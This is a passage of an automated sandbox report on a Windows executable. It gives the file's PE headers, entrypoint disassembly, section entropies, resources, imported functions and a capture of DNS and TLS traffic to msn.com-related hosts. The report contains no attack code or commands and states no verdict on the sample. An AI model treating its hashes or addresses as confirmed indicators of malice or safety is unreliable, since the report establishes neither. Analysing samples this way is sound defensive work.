                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:7da003d8e800bc756c1b5c669773abad

                                                                Entrypoint Preview

                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                add esp, FFFFFFF0h
                                                                mov eax, 006098A8h
                                                                call 00007F5EC8E7B80Dh
                                                                call 00007F5EC8E7F1D8h
                                                                call 00007F5EC8E7A2CFh
                                                                mov eax, eax
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc0000x67a.idata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x209a8.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xf0000xbec.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xe0180x1e.rdata
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0xe0000x18.rdata
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                CODE0x10000x890c0x8a00bd6a05f4be2120dbcef09f646ae8bc30False0.5860224184782609data6.429370275870393IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                DATA0xa0000x4040x600f103e0998158a12d5223843f2763b1daFalse0.3294270833333333data2.9582820148833355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                BSS0xb0000x7a10x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .idata0xc0000x67a0x8003dd5e9c053d01f6a245d1c7c049925ecFalse0.3603515625data3.9208704439233952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .tls0xd0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rdata0xe0000x360x20099b7b1893986074cfaeecaf9d49b77f5False0.11328125data0.7311971302589005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                .reloc0xf0000xbec0xc00129e326df99daca428d64f066aec4c62False0.7962239583333334data6.532654370403171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                .rsrc0x100000x20a580x20c00bdd971d47fd507a085ee2df2b7f4b772False0.8647274570610687data7.928434086651914IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x10ab00x148Device independent bitmap graphic, 8 x 16 x 32, image size 288FrenchBelgium0.7682926829268293
                                                                RT_STRING0x10bf80x34data0.5
                                                                RT_STRING0x10c2c0xecdata0.4788135593220339
                                                                RT_STRING0x10d180xd0data0.5673076923076923
                                                                RT_STRING0x10de80x2acdata0.4371345029239766
                                                                RT_STRING0x110940x358data0.4158878504672897
                                                                RT_STRING0x113ec0x2b4data0.4060693641618497
                                                                RT_RCDATA0x116a00x3cdata0.9166666666666666
                                                                RT_GROUP_ICON0x116dc0x14dataFrenchBelgium1.1
                                                                RT_VERSION0x116f00xf80data1.0027721774193548
                                                                RT_VERSION0x126700xf80data1.0027721774193548
                                                                RT_VERSION0x135f00xf80data1.0027721774193548
                                                                RT_VERSION0x145700xf80OpenPGP Secret Key1.0027721774193548
                                                                RT_VERSION0x154f00xf80data1.0027721774193548
                                                                RT_VERSION0x164700xf80data1.0027721774193548
                                                                RT_VERSION0x173f00xf80data0.8482862903225806
                                                                RT_VERSION0x183700xf80data0.3019153225806452
                                                                RT_VERSION0x192f00xf80data0.6333165322580645
                                                                RT_VERSION0x1a2700xf80data0.3878528225806452
                                                                RT_VERSION0x1b1f00xf80data1.0027721774193548
                                                                RT_VERSION0x1c1700xf80data1.0027721774193548
                                                                RT_VERSION0x1d0f00xf80data0.9944556451612904
                                                                RT_VERSION0x1e0700xf80data0.1743951612903226
                                                                RT_VERSION0x1eff00xdASCII text, with no line terminators1.6153846153846154
                                                                RT_VERSION0x1f0000xf80data0.5922379032258065
                                                                RT_VERSION0x1ff800xf80data1.0027721774193548
                                                                RT_VERSION0x20f000xf80data1.0027721774193548
                                                                RT_VERSION0x21e800xf80data1.0027721774193548
                                                                RT_VERSION0x22e000xf80data1.0027721774193548
                                                                RT_VERSION0x23d800xf80data1.0027721774193548
                                                                RT_VERSION0x24d000xf80data1.0027721774193548
                                                                RT_VERSION0x25c800xf80data1.0027721774193548
                                                                RT_VERSION0x26c000xf80data1.0027721774193548
                                                                RT_VERSION0x27b800xf80data1.0027721774193548
                                                                RT_VERSION0x28b000xf80data1.0027721774193548
                                                                RT_VERSION0x29a800xf80data1.0027721774193548
                                                                RT_VERSION0x2aa000xf80data1.0027721774193548
                                                                RT_VERSION0x2b9800xf80data1.0027721774193548
                                                                RT_VERSION0x2c9000xf80data1.0027721774193548
                                                                RT_VERSION0x2d8800xf80data1.0027721774193548
                                                                RT_VERSION0x2e8000xf80data1.0027721774193548
                                                                RT_VERSION0x2f7800xf80data1.0027721774193548
                                                                RT_VERSION0x307000x1very short file (no magic)9.0
                                                                RT_VERSION0x307040x4ASCII text, with no line terminators3.0
                                                                RT_VERSION0x307080x2ASCII text, with no line terminators5.0
                                                                RT_VERSION0x3070c0x1very short file (no magic)9.0
                                                                RT_VERSION0x307100x1very short file (no magic)9.0
                                                                RT_VERSION0x307140x294OpenPGP Secret KeyEnglishUnited States0.4090909090909091

                                                                Imports

                                                                DLLImport
                                                                kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, WideCharToMultiByte, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                oleaut32.dllSysFreeString, SysReAllocStringLen
                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                kernel32.dlllstrcmpA, WriteFile, VirtualQuery, LoadLibraryA, GetVersionExA, GetThreadLocale, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetDiskFreeSpaceA, GetCPInfo, GetACP, EnumCalendarInfoA, CloseHandle
                                                                user32.dllCreateWindowExA, MessageBoxA, LoadStringA, GetSystemMetrics, CharNextA, CharToOemA

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                FrenchBelgium
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 31, 2024 09:05:00.240416050 CET49174443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:00.240457058 CET4434917418.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:00.240510941 CET49174443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:00.240840912 CET49174443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:00.240859032 CET4434917418.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:00.240901947 CET49175443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:00.240936041 CET4434917518.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:00.240993023 CET49175443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:00.241161108 CET49175443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:00.241173983 CET4434917518.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:00.270042896 CET49180443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.270082951 CET44349180151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.270148039 CET49180443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.270513058 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.270529032 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.270576000 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.270772934 CET49180443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.270788908 CET44349180151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.270838022 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.270847082 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.728183031 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.728249073 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.729991913 CET44349180151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.730062008 CET49180443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.735071898 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.735083103 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.735392094 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.735462904 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.739834070 CET49180443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.739856958 CET44349180151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.740287066 CET44349180151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.740348101 CET49180443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.743490934 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.791335106 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.838048935 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.838114977 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.838462114 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.838510990 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.838519096 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.838552952 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.838561058 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.838571072 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.838596106 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.838599920 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.838612080 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.838617086 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.838651896 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.838879108 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.838912010 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.838932037 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.838937044 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.838958979 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.838979006 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.838979959 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.838995934 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.839030027 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.839046955 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.839587927 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.839622021 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.839627981 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.839632988 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.839668989 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.842063904 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.843255043 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.843288898 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.843323946 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.843323946 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.843331099 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.843374014 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.853439093 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.853493929 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.925287008 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925329924 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925348997 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.925374985 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925386906 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925386906 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.925410986 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.925415993 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925425053 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.925425053 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925457001 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925462008 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.925467014 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925487995 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925504923 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.925509930 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925520897 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925534010 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.925559044 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.925566912 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925575018 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925620079 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.925631046 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.925668955 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.926273108 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926306009 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926312923 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.926317930 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926337004 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926346064 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.926358938 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.926362991 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926372051 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926372051 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.926405907 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.926409960 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926455975 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.926842928 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926877022 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926892996 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.926897049 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926914930 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926928043 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.926939011 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.926943064 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926954031 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.926954031 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926986933 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.926986933 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.926995039 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.927025080 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.927035093 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.927079916 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.927661896 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.927697897 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.927715063 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.927723885 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.927733898 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.927736998 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.927762032 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.927766085 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.927776098 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.927777052 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.927809000 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.927809000 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.927817106 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.927845955 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.927856922 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:00.927938938 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:00.972832918 CET4434917518.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:00.972894907 CET49175443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:00.977293015 CET49175443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:00.977298975 CET4434917518.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:00.977621078 CET4434917518.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:00.977680922 CET49175443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:00.980783939 CET49175443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:00.987967968 CET4434917418.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:00.988044977 CET49174443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:00.994121075 CET49174443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:00.994132996 CET4434917418.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:00.994440079 CET4434917418.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:00.994664907 CET49174443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:01.012758970 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:01.012767076 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:01.012797117 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:01.012840986 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:01.012847900 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:01.012875080 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:01.012885094 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:01.012914896 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:01.013453007 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:01.013488054 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:01.013504982 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:01.013509035 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:01.013531923 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:01.013546944 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:01.014197111 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:01.014251947 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:01.014259100 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:01.014302969 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:01.014398098 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:01.014409065 CET44349181151.101.2.137192.168.2.22
                                                                Dec 31, 2024 09:05:01.014416933 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:01.014452934 CET49181443192.168.2.22151.101.2.137
                                                                Dec 31, 2024 09:05:01.027328968 CET4434917518.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:01.239876986 CET4434917518.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:01.239933014 CET4434917518.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:01.239988089 CET49175443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:01.241287947 CET49175443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:01.241302967 CET4434917518.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:01.241357088 CET49175443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:01.241357088 CET49175443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:01.242681026 CET49174443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:01.287332058 CET4434917418.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:01.435092926 CET4434917418.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:01.435234070 CET4434917418.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:01.435324907 CET49174443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:01.437709093 CET49174443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:01.437726021 CET4434917418.244.18.38192.168.2.22
                                                                Dec 31, 2024 09:05:01.437804937 CET49174443192.168.2.2218.244.18.38
                                                                Dec 31, 2024 09:05:01.437832117 CET49174443192.168.2.2218.244.18.38

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 31, 2024 09:04:56.396481037 CET6275153192.168.2.228.8.8.8
                                                                Dec 31, 2024 09:04:58.321872950 CET5789353192.168.2.228.8.8.8
                                                                Dec 31, 2024 09:05:00.209182978 CET6551053192.168.2.228.8.8.8
                                                                Dec 31, 2024 09:05:00.225066900 CET6267253192.168.2.228.8.8.8
                                                                Dec 31, 2024 09:05:00.239978075 CET53626728.8.8.8192.168.2.22
                                                                Dec 31, 2024 09:05:00.259526014 CET4938453192.168.2.228.8.8.8
                                                                Dec 31, 2024 09:05:00.269587040 CET53493848.8.8.8192.168.2.22
                                                                Dec 31, 2024 09:05:00.382004976 CET5484253192.168.2.228.8.8.8

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 31, 2024 09:04:56.396481037 CET192.168.2.228.8.8.80xc2aStandard query (0)www.msn.comA (IP address)IN (0x0001)false
                                                                Dec 31, 2024 09:04:58.321872950 CET192.168.2.228.8.8.80x4ab4Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.209182978 CET192.168.2.228.8.8.80x397cStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.225066900 CET192.168.2.228.8.8.80x7ad0Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.259526014 CET192.168.2.228.8.8.80x4bfaStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.382004976 CET192.168.2.228.8.8.80x37fbStandard query (0)browser.events.data.msn.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
